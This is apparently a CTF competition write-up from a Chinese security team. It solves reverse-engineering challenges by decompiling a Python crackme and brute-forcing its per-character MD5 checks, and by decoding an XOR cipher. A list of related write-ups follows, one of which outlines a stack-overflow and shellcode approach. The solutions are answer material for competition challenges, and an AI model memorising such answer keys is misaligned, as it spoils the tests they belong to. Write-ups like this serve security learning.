位运算本身不可逆,而我算法也不大行,所以直接正面爆破。我们可以把每一位的表达式看做一种条件,而对于移位和或运算,必然会有多解,满足所有条件,才能确定唯一的flag。在我多次的尝试之后发现,每一位的取值其实可能性也很有限,而在前后两个条件的限制下,其实就会固定,所以可以进行分段爆破。(不存在艺术,简单粗暴才能抢血)大致给一下部分代码截图,就不给完全了,每个人的爆破代码都不一样的。
ReMe
解题思路
这题主要考察python的反编译,具体从exe->pyc->py这个过程可以百度,这里不多说。反编译后的代码如下
# uncompyle6 version 3.7.4# Python bytecode 3.7 (3394)# Decompiled from: Python 2.7.15+ (default, Aug 31 2018, 11:56:52)# [GCC 8.2.0]# Warning: this version of Python has problems handling the Python 3 "byte" type in constants properly.# Embedded file name: ReMe.py# Compiled at: 1995-09-28 00:18:56# Size of source mod 2**32: 272 bytesimport sys, hashlibcheck = ['e5438e78ec1de10a2693f9cffb930d23','08e8e8855af8ea652df54845d21b9d67','a905095f0d801abd5865d649a646b397','bac8510b0902185146c838cdf8ead8e0','f26f009a6dc171e0ca7a4a770fecd326','cffd0b9d37e7187483dc8dd19f4a8fa8','4cb467175ab6763a9867b9ed694a2780','8e50684ac9ef90dfdc6b2e75f2e23741','cffd0b9d37e7187483dc8dd19f4a8fa8','fd311e9877c3db59027597352999e91f','49733de19d912d4ad559736b1ae418a7','7fb523b42413495cc4e610456d1f1c84','8e50684ac9ef90dfdc6b2e75f2e23741','acb465dc618e6754de2193bf0410aafe','bc52c927138231e29e0b05419e741902','515b7eceeb8f22b53575afec4123e878','451660d67c64da6de6fadc66079e1d8a','8e50684ac9ef90dfdc6b2e75f2e23741','fe86104ce1853cb140b7ec0412d93837','acb465dc618e6754de2193bf0410aafe','c2bab7ea31577b955e2c2cac680fb2f4','8e50684ac9ef90dfdc6b2e75f2e23741','f077b3a47c09b44d7077877a5aff3699','620741f57e7fafe43216d6aa51666f1d','9e3b206e50925792c3234036de6a25ab','49733de19d912d4ad559736b1ae418a7','874992ac91866ce1430687aa9f7121fc']def func(num):result = []while num != 1:num = num * 3 + 1 if num % 2 else num // 2result.append(num)return resultif __name__ == '__main__':print('Your input is not the FLAG!')inp = input()if len(inp) != 27:print('length error!')sys.exit(-1)for i, ch in enumerate(inp):ret_list = func(ord(ch))s = ''for idx in range(len(ret_list)):s += str(ret_list[idx])s += str(ret_list[(len(ret_list) - idx - 1)])md5 = hashlib.md5()md5.update(s.encode('utf-8'))if md5.hexdigest() != check[i]:sys.exit(i)md5 = hashlib.md5()md5.update(inp.encode('utf-8'))print('You win!')print('flag{' + md5.hexdigest() + '}')# okay decompiling 2.pyc
稍微改一改源码,就会自己出flag
# uncompyle6 version 3.7.4# Python bytecode 3.7 (3394)# Decompiled from: Python 2.7.15+ (default, Aug 31 2018, 11:56:52)# [GCC 8.2.0]# Warning: this version of Python has problems handling the Python 3 "byte" type in constants properly.# Embedded file name: ReMe.py# Compiled at: 1995-09-28 00:18:56# Size of source mod 2**32: 272 bytesimport sys, hashlibcheck = ['e5438e78ec1de10a2693f9cffb930d23','08e8e8855af8ea652df54845d21b9d67','a905095f0d801abd5865d649a646b397','bac8510b0902185146c838cdf8ead8e0','f26f009a6dc171e0ca7a4a770fecd326','cffd0b9d37e7187483dc8dd19f4a8fa8','4cb467175ab6763a9867b9ed694a2780','8e50684ac9ef90dfdc6b2e75f2e23741','cffd0b9d37e7187483dc8dd19f4a8fa8','fd311e9877c3db59027597352999e91f','49733de19d912d4ad559736b1ae418a7','7fb523b42413495cc4e610456d1f1c84','8e50684ac9ef90dfdc6b2e75f2e23741','acb465dc618e6754de2193bf0410aafe','bc52c927138231e29e0b05419e741902','515b7eceeb8f22b53575afec4123e878','451660d67c64da6de6fadc66079e1d8a','8e50684ac9ef90dfdc6b2e75f2e23741','fe86104ce1853cb140b7ec0412d93837','acb465dc618e6754de2193bf0410aafe','c2bab7ea31577b955e2c2cac680fb2f4','8e50684ac9ef90dfdc6b2e75f2e23741','f077b3a47c09b44d7077877a5aff3699','620741f57e7fafe43216d6aa51666f1d','9e3b206e50925792c3234036de6a25ab','49733de19d912d4ad559736b1ae418a7','874992ac91866ce1430687aa9f7121fc']def func(num):result = []while num != 1:num = num * 3 + 1 if num % 2 else num // 2result.append(num)return resultif __name__ == '__main__':flag = '''''print('Your input is not the FLAG!')inp = input()if len(inp) != 27:print('length error!')sys.exit(-1)for i, ch in enumerate(inp):'''for i in range(len(check)):for ch in range(32,128):ret_list = func(ch)s = ''for idx in range(len(ret_list)):s += str(ret_list[idx])s += str(ret_list[(len(ret_list) - idx - 1)])md5 = hashlib.md5()md5.update(s.encode('utf-8'))if md5.hexdigest() == check[i]:flag += chr(ch)print(flag)'''md5 = hashlib.md5()md5.update(inp.encode('utf-8'))print('You win!')print('flag{' + md5.hexdigest() + '}')'''# okay decompiling 2.pyc
easy_c++
签到题,最基本的逆向。
这里可以看到最关键的三个地方,就是很常见的,密文,加密算法,比较,而算法又是最基础的xor。直接上脚本就行
>>> a = '7d21e>> flag = ''>>> for i in range(len(a)):... flag += chr(ord(a[i])^i)...>>> flag'7e02a9c4439056df0e2a7b432b0069b3'
end
ChaMd5 ctf组 长期招新
尤其是crypto+reverse+pwn+合约的大佬
本文始发于微信公众号(ChaMd5安全团队):湖湘杯-WriteUp
slax9Linux中文,湖湘杯-WriteUp | CN-SEC 中文网相关推荐
- 2017湖湘杯Writeup
作者:LB919 出处:http://www.cnblogs.com/L1B0/ RE部分 0x01 Re4newer 解题思路: Step1:die打开,发现有upx壳. Step2:脱壳,执行up ...
- 2018湖湘杯writeup
题目名MISC Disk 解题思路.相关代码和Flag截图: 010Editor下查看,flag is not here分析a.d.s后二进制,提取出来,发现 01100110 01101100 01 ...
- 2018湖湘杯海选复赛Writeup
2018湖湘杯Writeup 0x01 签到题 0x02 MISC Flow 0x03 WEB Code Check 0x04 WEB Readflag 0x05 WEB XmeO 0x06 Reve ...
- 2020湖湘杯部分writeup
周末打了湖湘杯,把做题过程记录一下,大家交流学习. 下面的链接里有题目,可以下来看看. https://download.csdn.net/download/jameswhite2417/130819 ...
- 2021湖湘杯 Hideit Writeup
2021湖湘杯 Hideit AAA : immortal 动态调试 直接x64dbg动调找到了关键的加密代码分别是xxtea 和 chacha20,直接动调从中拿出各种参数然后写代码进行解密.其实一 ...
- 2020湖湘杯-CRYPTO-LFSRXOR
2020HXB-CRYPTO-LFSRXOR LFSRXOR 题目分析 开始 1.题目 2.数学理论 3.回到题目 (1)源代码 (2)LFSR分析 (3)content原文分析 4.破解 5.get ...
- 2017湖湘杯 pwn300
2017湖湘杯 pwn300 该题为简单栈溢出,利用方法如下: (1)覆盖返回地址为read函数读入shellcode (2)执行mprotect让bss段的地址变的可执行 (3)跳转shellcod ...
- 湖湘杯2019两个密码题wp
湖湘杯2019两个密码题wp 还是自己太菜的原因,这次湖湘杯只做出来4道题,然后5点的时候就放弃了去跟同学出去玩了,当时感觉进前50无望(这次湖湘杯py情况也很严重啊,可惜烽火台只报不封,挺恶心的 ...
- 2019湖湘杯 misc3 之miscmisc
** 2019湖湘杯 misc3 之miscmisc* 明文攻击 关于LSB图片隐写的解法 word字符隐藏显示 zip加密文件破解 作为CTF小白,对于CTF一如既往的热爱,一个人报名了今年的湖湘杯 ...
最新文章
- HelloX项目github协同开发指南
- msm8953+android8.1接听电话时声音由默认听筒输出改为外放输出
- java.lang.IllegalStateException: Context namespace element ‘annotation-config’ and its parser class
- MySql 查询同一字段多个结果合并到一行显示 GROUP_CONCAT
- PHP里的$_SERVER对象
- 【计算机网络】OSI参考模型与TCP/IP分层模型详解(超级详细,三张图完整说明)
- 假如有一款机器可以采集人的脑电波用于写作多好!
- 阻塞队列BlockingQueue用法
- linux php 上级目录,Linux目录架构详解_php
- 小程序类似抖音视频整屏切换
- 为什么有的人洗脚时要在水里滴几滴醋?
- 消息驱动式微服务:Spring Cloud Stream RabbitMQ
- nginx lnmp之nginx+php
- 最容易扩展的光立方程序设计
- 2016最新微信公众号运营必备网址大全
- AD8302 幅度相位检测 鉴幅鉴相器 解调对数放大器 原理图PCB
- 百度经纬度与高德经纬度互转
- 人体动作捕捉与SMPL模型 (mocap and SMPL model)
- 更适合运动的耳机,设计时尚轻巧好用,南卡Runner CC3上手
- Android打地鼠小游戏案例